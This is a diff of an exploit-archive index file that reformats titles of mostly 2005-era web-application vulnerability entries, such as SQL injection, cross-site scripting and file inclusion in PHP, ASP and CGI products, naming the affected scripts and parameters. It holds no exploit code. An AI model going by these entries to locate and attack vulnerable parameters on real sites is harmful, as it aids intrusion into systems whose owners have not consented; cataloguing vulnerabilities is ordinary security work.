26766,platforms/cfm/webapps/26766.txt,"CF_Nuke 4.6 - 'index.cfm' Local File Inclusion",2005-12-08,r0t,cfm,webapps,0 26767,platforms/cfm/webapps/26767.txt,"CF_Nuke 4.6 - index.cfm Cross-Site Scripting",2005-12-08,r0t,cfm,webapps,0 26770,platforms/php/webapps/26770.txt,"MilliScripts 1.4 - register.php Cross-Site Scripting",2005-12-08,"Security Nation",php,webapps,0 @@ -29298,49 +29299,49 @@ id,file,description,date,author,platform,type,port 26785,platforms/php/webapps/26785.txt,"Arab Portal 2.0 - 'Link.php' SQL Injection",2005-12-12,stranger-killer,php,webapps,0 26786,platforms/cgi/webapps/26786.txt,"EveryAuction 1.53 - Auction.pl Cross-Site Scripting",2005-12-13,$um$id,cgi,webapps,0 26787,platforms/php/webapps/26787.txt,"phpCOIN 1.2.2 - CCFG[_PKG_PATH_DBSE] Remote File Inclusion",2005-12-13,retrogod@aliceposta.it,php,webapps,0 -26788,platforms/php/webapps/26788.txt,"PHPCOIN 1.2.2 - 'includes/db.php $_CCFG[_PKG_PATH_DBSE]' Parameter Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps,0 +26788,platforms/php/webapps/26788.txt,"PHPCOIN 1.2.2 - 'includes/db.php?$_CCFG[_PKG_PATH_DBSE]' Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps,0 26789,platforms/php/webapps/26789.txt,"EncapsGallery 1.0 - gallery.php SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26790,platforms/php/webapps/26790.txt,"PHPWebGallery 1.3.4/1.5.1 - 'comments.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26791,platforms/php/webapps/26791.txt,"PHPWebGallery 1.3.4/1.5.1 - 'category.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26792,platforms/php/webapps/26792.txt,"PHPWebGallery 1.3.4/1.5.1 - 'picture.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26793,platforms/php/webapps/26793.txt,"Plogger Beta 2 - 'index.php' id Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 -26794,platforms/php/webapps/26794.txt,"Plogger Beta 2 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-12-13,r0t,php,webapps,0 -26795,platforms/php/webapps/26795.txt,"VCD-db 0.9x - search.php by Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 +26794,platforms/php/webapps/26794.txt,"Plogger Beta 2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-13,r0t,php,webapps,0 +26795,platforms/php/webapps/26795.txt,"VCD-db 0.9x - 'search.php?by' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26796,platforms/php/webapps/26796.txt,"VCD-db 0.9x Search Module - batch Parameter Cross-Site Scripting",2005-12-13,r0t3d3Vil,php,webapps,0 26797,platforms/php/webapps/26797.txt,"PHP JackKnife 2.21 - Cross-Site Scripting",2005-12-13,r0t3d3Vil,php,webapps,0 26798,platforms/php/webapps/26798.txt,"Mantis 0.x/1.0 - View_filters_page.php Cross-Site Scripting",2005-12-13,r0t,php,webapps,0 -26799,platforms/php/webapps/26799.txt,"Snipe Gallery 3.1.4 - view.php gallery_id Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 -26800,platforms/php/webapps/26800.txt,"Snipe Gallery 3.1.4 - image.php image_id Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 -26801,platforms/php/webapps/26801.txt,"Snipe Gallery 3.1.4 - search.php keyword Parameter Cross-Site Scripting",2005-12-13,r0t,php,webapps,0 -27438,platforms/php/webapps/27438.txt,"Invision Power Services Invision Board 2.0.4 - Calendar Action Multiple Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 +26799,platforms/php/webapps/26799.txt,"Snipe Gallery 3.1.4 - 'view.php?gallery_id' SQL Injection",2005-12-13,r0t,php,webapps,0 +26800,platforms/php/webapps/26800.txt,"Snipe Gallery 3.1.4 - 'image.php?image_id' SQL Injection",2005-12-13,r0t,php,webapps,0 +26801,platforms/php/webapps/26801.txt,"Snipe Gallery 3.1.4 - 'search.php?keyword' Cross-Site Scripting",2005-12-13,r0t,php,webapps,0 +27438,platforms/php/webapps/27438.txt,"Invision Power Services Invision Board 2.0.4 - Calendar Action Multiple Cross-Site Scripting Vulnerabilities",2006-03-17,Mr.SNAKE,php,webapps,0 26804,platforms/php/webapps/26804.txt,"WordPress Plugin Spicy Blogroll - Local File Inclusion",2013-07-13,Ahlspiess,php,webapps,0 26806,platforms/asp/webapps/26806.txt,"BMC Service Desk Express 10.2.1.95 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",asp,webapps,0 26807,platforms/windows/webapps/26807.txt,"McAfee ePO 4.6.6 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",windows,webapps,0 26808,platforms/php/webapps/26808.txt,"McGallery 1.0/1.1/2.2 - 'index.php' language Parameter Traversal Local File Inclusion",2005-12-13,r0t,php,webapps,0 -26809,platforms/php/webapps/26809.txt,"McGallery 1.0/1.1/2.2 - show.php Multiple Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 +26809,platforms/php/webapps/26809.txt,"McGallery 1.0/1.1/2.2 - 'show.php' Multiple SQL Injections",2005-12-13,r0t,php,webapps,0 26810,platforms/php/webapps/26810.txt,"McGallery 1.0/1.1/2.2 - 'index.php' album Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 26812,platforms/php/webapps/26812.txt,"PHP Web Scripts Ad Manager Pro 2.0 - Advertiser_statistic.php SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 26813,platforms/php/webapps/26813.txt,"Jamit Job Board 2.4.1 - 'index.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 26814,platforms/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 - 'View_Results.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 26815,platforms/php/webapps/26815.txt,"CourseForum Technologies ProjectForum 4.7 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,r0t3d3Vil,php,webapps,0 26817,platforms/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Byapss",2005-12-14,"Maksymilian Arciemowicz",php,webapps,0 -26818,platforms/php/webapps/26818.txt,"News Module for Envolution - modules.php Multiple Parameter Cross-Site Scripting",2005-12-14,X1ngBox,php,webapps,0 -26819,platforms/php/webapps/26819.txt,"News Module for Envolution - modules.php Multiple Parameter SQL Injection",2005-12-14,X1ngBox,php,webapps,0 +26818,platforms/php/webapps/26818.txt,"News Module for Envolution - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,X1ngBox,php,webapps,0 +26819,platforms/php/webapps/26819.txt,"News Module for Envolution - 'modules.php' Multiple SQL Injections",2005-12-14,X1ngBox,php,webapps,0 26820,platforms/asp/webapps/26820.txt,"ASP-DEV XM Forum - forum.asp Cross-Site Scripting",2005-12-14,Dj_Eyes,asp,webapps,0 -26821,platforms/asp/webapps/26821.txt,"ASPBB 0.4 - topic.asp TID Parameter SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 -26822,platforms/asp/webapps/26822.txt,"ASPBB 0.4 - forum.asp FORUM_ID Parameter SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 -26823,platforms/asp/webapps/26823.txt,"ASPBB 0.4 - profile.asp PROFILE_ID Parameter SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 +26821,platforms/asp/webapps/26821.txt,"ASPBB 0.4 - 'topic.asp?TID' SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 +26822,platforms/asp/webapps/26822.txt,"ASPBB 0.4 - 'forum.asp?FORUM_ID' SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 +26823,platforms/asp/webapps/26823.txt,"ASPBB 0.4 - 'profile.asp?PROFILE_ID' SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 26824,platforms/php/webapps/26824.txt,"WikkaWiki 1.1.6 - TextSearch.php Cross-Site Scripting",2005-12-14,r0t,php,webapps,0 26826,platforms/php/webapps/26826.txt,"Netref 3.0 - 'index.php' SQL Injection",2005-12-14,syst3m_f4ult,php,webapps,0 -26831,platforms/php/webapps/26831.txt,"QuickPayPro 3.1 - tracking.details.php trackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 -26832,platforms/php/webapps/26832.txt,"QuickPayPro 3.1 - sales.view.php customerid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 +26831,platforms/php/webapps/26831.txt,"QuickPayPro 3.1 - 'tracking.details.php?trackingid' SQL Injection",2005-12-14,r0t,php,webapps,0 +26832,platforms/php/webapps/26832.txt,"QuickPayPro 3.1 - 'sales.view.php?customerid' SQL Injection",2005-12-14,r0t,php,webapps,0 26836,platforms/php/webapps/26836.txt,"Limbo CMS 1.0.4.2 - 'index.php' _SERVER[REMOTE_ADDR] Parameter Cross-Site Scripting",2005-12-14,rgod,php,webapps,0 -26837,platforms/php/webapps/26837.txt,"Limbo CMS 1.0.4.2 - 'option' Parameter Traversal Arbitrary File Access",2005-12-14,rgod,php,webapps,0 +26837,platforms/php/webapps/26837.txt,"Limbo CMS 1.0.4.2 - 'option' Traversal Arbitrary File Access",2005-12-14,rgod,php,webapps,0 26838,platforms/php/webapps/26838.txt,"MarmaraWeb E-Commerce - 'index.php' page Parameter Cross-Site Scripting",2005-12-15,B3g0k,php,webapps,0 26839,platforms/php/webapps/26839.txt,"TML 0.5 - 'index.php' form Parameter Cross-Site Scripting",2005-12-15,X1ngBox,php,webapps,0 26840,platforms/php/webapps/26840.txt,"TML 0.5 - 'index.php' id Parameter SQL Injection",2005-12-15,X1ngBox,php,webapps,0 26841,platforms/php/webapps/26841.txt,"MarmaraWeb E-Commerce - Remote File Inclusion",2005-12-15,B3g0k,php,webapps,0 -26842,platforms/cgi/webapps/26842.txt,"Sitenet BBS 2.0 - netboardr.cgi Multiple Parameter Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 +26842,platforms/cgi/webapps/26842.txt,"Sitenet BBS 2.0 - 'netboardr.cgi' Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 26843,platforms/cgi/webapps/26843.txt,"Sitenet BBS 2.0 - search.cgi cid Parameter Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 26844,platforms/php/webapps/26844.txt,"DCForum 1-6 DCBoard Script - Page Parameter Cross-Site Scripting",2005-12-15,r0t3d3Vil,php,webapps,0 26845,platforms/cgi/webapps/26845.txt,"Atlant Pro 8.0.9 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 @@ -29356,29 +29357,29 @@ id,file,description,date,author,platform,type,port 26855,platforms/php/webapps/26855.txt,"IHTML Merchant Mall - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26856,platforms/php/webapps/26856.txt,"IHTML Merchant 2.0 - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26857,platforms/php/webapps/26857.txt,"PHP Arena PAFileDB Extreme Edition - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 -26858,platforms/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - 'reply.pl' Multiple Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 -26859,platforms/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - 'stats.pl' Multiple Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 -26860,platforms/cgi/webapps/26860.txt,"Binary Board System 0.2.5 - 'toc.pl board' Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 +26858,platforms/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - 'reply.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-12-16,r0t3d3Vil,cgi,webapps,0 +26859,platforms/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - 'stats.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-12-16,r0t3d3Vil,cgi,webapps,0 +26860,platforms/cgi/webapps/26860.txt,"Binary Board System 0.2.5 - 'toc.pl?board' Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 26861,platforms/cgi/webapps/26861.txt,"ScareCrow 2.13 - forum.cgi forum Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 26862,platforms/cgi/webapps/26862.txt,"ScareCrow 2.13 - profile.cgi user Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 26863,platforms/cgi/webapps/26863.txt,"ScareCrow 2.13 - post.cgi forum Parameter Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 26864,platforms/cgi/webapps/26864.txt,"WebGlimpse 2.x - Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 -26865,platforms/cgi/webapps/26865.txt,"WebCal 3.0 4 - webcal.cgi Multiple Parameter Cross-Site Scripting",2005-12-16,"Stan Bubrouski",cgi,webapps,0 +26865,platforms/cgi/webapps/26865.txt,"WebCal 3.0 4 - 'webcal.cgi' Multiple Cross-Site Scripting Vulnerabilities",2005-12-16,"Stan Bubrouski",cgi,webapps,0 26866,platforms/php/webapps/26866.txt,"Round Cube Webmail 0.1 -20051021 - Full Path Disclosure",2005-12-17,king_purba,php,webapps,0 26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,"bogel and lukman",php,webapps,0 26868,platforms/php/webapps/26868.txt,"jPORTAL 2.2.1/2.3 Forum - 'forum.php' SQL Injection",2005-12-19,Zbigniew,php,webapps,0 26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0 26871,platforms/php/webapps/26871.txt,"PlaySms 0.8 - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0 26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting",2005-12-19,krasza,php,webapps,0 -26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - 'ID' Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0 +26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - 'ID' SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0 26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - 'acidcat.mdb' Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0 -26875,platforms/asp/webapps/26875.txt,"allinta CMS 2.3.2 - faq.asp s Parameter Cross-Site Scripting",2005-12-19,r0t3d3Vil,asp,webapps,0 -26876,platforms/asp/webapps/26876.txt,"allinta CMS 2.3.2 - search.asp searchQuery Parameter Cross-Site Scripting",2005-12-19,r0t3d3Vil,asp,webapps,0 +26875,platforms/asp/webapps/26875.txt,"allinta CMS 2.3.2 - 'faq.asp?s' Cross-Site Scripting",2005-12-19,r0t3d3Vil,asp,webapps,0 +26876,platforms/asp/webapps/26876.txt,"allinta CMS 2.3.2 - 'search.asp?searchQuery' Cross-Site Scripting",2005-12-19,r0t3d3Vil,asp,webapps,0 26877,platforms/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0 26878,platforms/php/webapps/26878.txt,"Caravel CMS 3.0 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 26879,platforms/php/webapps/26879.txt,"Cofax 2.0 - search.htm Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0 -26880,platforms/php/webapps/26880.txt,"FLIP 0.9.0.1029 - text.php name Parameter Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0 -26881,platforms/php/webapps/26881.txt,"FLIP 0.9.0.1029 - forum.php frame Parameter Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0 +26880,platforms/php/webapps/26880.txt,"FLIP 0.9.0.1029 - 'text.php?name' Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0 +26881,platforms/php/webapps/26881.txt,"FLIP 0.9.0.1029 - 'forum.php?frame' Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0 26882,platforms/cfm/webapps/26882.txt,"Hot Banana Web Content Management Suite 5.3 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,cfm,webapps,0 26883,platforms/php/webapps/26883.txt,"Libertas Enterprise CMS 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0 26884,platforms/php/webapps/26884.txt,"Liferay Portal Enterprise 3.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 @@ -29393,14 +29394,14 @@ id,file,description,date,author,platform,type,port 26898,platforms/php/webapps/26898.txt,"ODFaq 2.1 - 'faq.php' SQL Injection",2005-12-19,r0t,php,webapps,0 26899,platforms/php/webapps/26899.txt,"Marwel 2.7 - 'index.php' SQL Injection",2005-12-19,r0t,php,webapps,0 26900,platforms/php/webapps/26900.txt,"Miraserver 1.0 RC4 - 'index.php' page Parameter SQL Injection",2005-12-19,r0t,php,webapps,0 -26901,platforms/php/webapps/26901.txt,"Miraserver 1.0 RC4 - newsitem.php id Parameter SQL Injection",2005-12-19,r0t,php,webapps,0 -26902,platforms/php/webapps/26902.txt,"Miraserver 1.0 RC4 - article.php cat Parameter SQL Injection",2005-12-19,r0t,php,webapps,0 +26901,platforms/php/webapps/26901.txt,"Miraserver 1.0 RC4 - 'newsitem.php?id' SQL Injection",2005-12-19,r0t,php,webapps,0 +26902,platforms/php/webapps/26902.txt,"Miraserver 1.0 RC4 - 'article.php?cat' SQL Injection",2005-12-19,r0t,php,webapps,0 26903,platforms/asp/webapps/26903.txt,"Baseline CMS 1.95 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t,asp,webapps,0 -26904,platforms/php/webapps/26904.txt,"Bitweaver 1.1.1 Beta - list_galleries.php sort_mode Parameter Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 -26905,platforms/php/webapps/26905.txt,"Bitweaver 1.1.1 - view_post.php post_id Parameter Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 -26906,platforms/php/webapps/26906.txt,"Bitweaver 1.1.1 - view.php blog_id Parameter Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 -26907,platforms/php/webapps/26907.txt,"Bitweaver 1.1.1 - message_box.php sort_mode Parameter Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 -26908,platforms/php/webapps/26908.txt,"Bitweaver 1.1.1 - my.php sort_mode Parameter Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 +26904,platforms/php/webapps/26904.txt,"Bitweaver 1.1.1 Beta - 'list_galleries.php?sort_mode' Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 +26905,platforms/php/webapps/26905.txt,"Bitweaver 1.1.1 - 'view_post.php?post_id' Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 +26906,platforms/php/webapps/26906.txt,"Bitweaver 1.1.1 - 'view.php?blog_id' Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 +26907,platforms/php/webapps/26907.txt,"Bitweaver 1.1.1 - 'message_box.php?sort_mode' Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 +26908,platforms/php/webapps/26908.txt,"Bitweaver 1.1.1 - 'my.php?sort_mode' Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 26909,platforms/cfm/webapps/26909.txt,"Community Enterprise 4.x - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,cfm,webapps,0 26910,platforms/cfm/webapps/26910.txt,"E-Publish 2.0 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,cfm,webapps,0 26911,platforms/php/webapps/26911.txt,"Komodo CMS 2.1 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 @@ -29410,7 +29411,7 @@ id,file,description,date,author,platform,type,port 26917,platforms/cgi/webapps/26917.txt,"LiveJournal - Cleanhtml.pl HTML Injection",2005-12-20,"Andrew Farmer",cgi,webapps,0 26918,platforms/php/webapps/26918.txt,"Plogger Beta 2 - Remote File Inclusion",2005-12-20,"Security .Net Information",php,webapps,0 26919,platforms/php/webapps/26919.txt,"AbleDesign D-Man 3.0 - Title Parameter Cross-Site Scripting",2005-12-20,$um$id,php,webapps,0 -26920,platforms/cfm/webapps/26920.txt,"Quick Square Development Honeycomb Archive 3.0 - CategoryResults.cfm Multiple Parameter SQL Injection",2005-12-20,r0t3d3Vil,cfm,webapps,0 +26920,platforms/cfm/webapps/26920.txt,"Quick Square Development Honeycomb Archive 3.0 - 'CategoryResults.cfm' Multiple SQL Injections",2005-12-20,r0t3d3Vil,cfm,webapps,0 26921,platforms/php/webapps/26921.txt,"Tolva 0.1 - 'Usermods.php' Remote File Inclusion",2005-12-21,xbefordx,php,webapps,0 26923,platforms/php/webapps/26923.txt,"Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities",2005-12-21,"Alireza Hassani",php,webapps,0 26924,platforms/jsp/webapps/26924.txt,"OpenEdit 4.0 - Results.HTML Cross-Site Scripting",2005-12-21,r0t3d3Vil,jsp,webapps,0 @@ -29418,25 +29419,25 @@ id,file,description,date,author,platform,type,port 26926,platforms/asp/webapps/26926.txt,"PortalApp 3.3/4.0 - 'login.asp' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26927,platforms/asp/webapps/26927.txt,"SiteEnable 3.3 - 'login.asp' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26928,platforms/asp/webapps/26928.txt,"IntranetApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 -26929,platforms/asp/webapps/26929.txt,"IntranetApp 3.3 - content.asp Multiple Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 -26930,platforms/asp/webapps/26930.txt,"ProjectApp 3.3 - forums.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 -26931,platforms/asp/webapps/26931.txt,"ProjectApp 3.3 - search_employees.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 -26932,platforms/asp/webapps/26932.txt,"ProjectApp 3.3 - cat.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 -26933,platforms/cgi/webapps/26933.txt,"ProjectApp 3.3 - links.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,cgi,webapps,0 -26934,platforms/asp/webapps/26934.txt,"ProjectApp 3.3 - pmprojects.asp projectid Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 +26929,platforms/asp/webapps/26929.txt,"IntranetApp 3.3 - 'content.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t,asp,webapps,0 +26930,platforms/asp/webapps/26930.txt,"ProjectApp 3.3 - 'forums.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 +26931,platforms/asp/webapps/26931.txt,"ProjectApp 3.3 - 'search_employees.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 +26932,platforms/asp/webapps/26932.txt,"ProjectApp 3.3 - 'cat.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 +26933,platforms/cgi/webapps/26933.txt,"ProjectApp 3.3 - 'links.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,cgi,webapps,0 +26934,platforms/asp/webapps/26934.txt,"ProjectApp 3.3 - 'pmprojects.asp?projectid' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26935,platforms/asp/webapps/26935.txt,"ProjectApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 -26936,platforms/asp/webapps/26936.txt,"ProjectApp 3.3 - default.asp skin_number Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 +26936,platforms/asp/webapps/26936.txt,"ProjectApp 3.3 - 'default.asp?skin_number' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26937,platforms/cgi/webapps/26937.txt,"ComputerOil Redakto CMS 3.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,cgi,webapps,0 -26938,platforms/php/webapps/26938.txt,"Scoop 1.1 RC1 - Search Module Multiple Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 +26938,platforms/php/webapps/26938.txt,"Scoop 1.1 RC1 Search Module - Multiple Cross-Site Scriptings",2005-12-21,r0t3d3Vil,php,webapps,0 26939,platforms/php/webapps/26939.txt,"Scoop 1.1 RC1 - Missing Story Error Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 26940,platforms/asp/webapps/26940.txt,"Commercial Interactive Media SCOOP! 2.3 - articleSearch.asp Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 -26941,platforms/asp/webapps/26941.txt,"Commercial Interactive Media SCOOP! 2.3 - lostPassword.asp Multiple Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 -26942,platforms/asp/webapps/26942.txt,"Commercial Interactive Media SCOOP! 2.3 - account_login.asp Multiple Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 -26943,platforms/asp/webapps/26943.txt,"Commercial Interactive Media SCOOP! 2.3 - category.asp Multiple Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 -26944,platforms/asp/webapps/26944.txt,"Commercial Interactive Media SCOOP! 2.3 - articleZone.asp Invalid Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 -26945,platforms/asp/webapps/26945.txt,"Commercial Interactive Media SCOOP! 2.3 - prePurchaserRegistration.asp Invalid Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 -26946,platforms/asp/webapps/26946.txt,"Commercial Interactive Media SCOOP! 2.3 - requestDemo.asp Invalid Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 -26947,platforms/asp/webapps/26947.txt,"Sitekit CMS 6.6 - Default.aspx Multiple Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 +26941,platforms/asp/webapps/26941.txt,"Commercial Interactive Media SCOOP! 2.3 - 'lostPassword.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,asp,webapps,0 +26942,platforms/asp/webapps/26942.txt,"Commercial Interactive Media SCOOP! 2.3 - 'account_login.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,asp,webapps,0 +26943,platforms/asp/webapps/26943.txt,"Commercial Interactive Media SCOOP! 2.3 - 'category.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,asp,webapps,0 +26944,platforms/asp/webapps/26944.txt,"Commercial Interactive Media SCOOP! 2.3 - 'articleZone.asp?Invalid' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 +26945,platforms/asp/webapps/26945.txt,"Commercial Interactive Media SCOOP! 2.3 - 'prePurchaserRegistration.asp?Invalid' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 +26946,platforms/asp/webapps/26946.txt,"Commercial Interactive Media SCOOP! 2.3 - 'requestDemo.asp?Invalid' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 +26947,platforms/asp/webapps/26947.txt,"Sitekit CMS 6.6 - 'Default.aspx' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,asp,webapps,0 26948,platforms/asp/webapps/26948.txt,"Sitekit CMS 6.6 - Request-call-back.html ClickFrom Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 26949,platforms/asp/webapps/26949.txt,"Sitekit CMS 6.6 - registration-form.html ClickFrom Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 26952,platforms/ios/webapps/26952.txt,"WiFly 1.0 Pro iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 @@ -29447,26 +29448,26 @@ id,file,description,date,author,platform,type,port 26957,platforms/windows/webapps/26957.txt,"Dell PacketTrap PSA 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0 26958,platforms/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,php,webapps,0 26959,platforms/php/webapps/26959.txt,"Papoo 2.1.2 - 'index.php' menuid Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 -26960,platforms/php/webapps/26960.txt,"Papoo 2.1.2 - Guestbook.php menuid Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 -26961,platforms/php/webapps/26961.txt,"Papoo 2.1.2 - print.php Multiple Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 +26960,platforms/php/webapps/26960.txt,"Papoo 2.1.2 - 'Guestbook.php?menuid' SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 +26961,platforms/php/webapps/26961.txt,"Papoo 2.1.2 - 'print.php' Multiple SQL Injections",2005-12-21,r0t3d3Vil,php,webapps,0 26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 - 'article.php' SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 -26963,platforms/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise - 'news_and_events_new.asp' p_news_id Parameter SQL 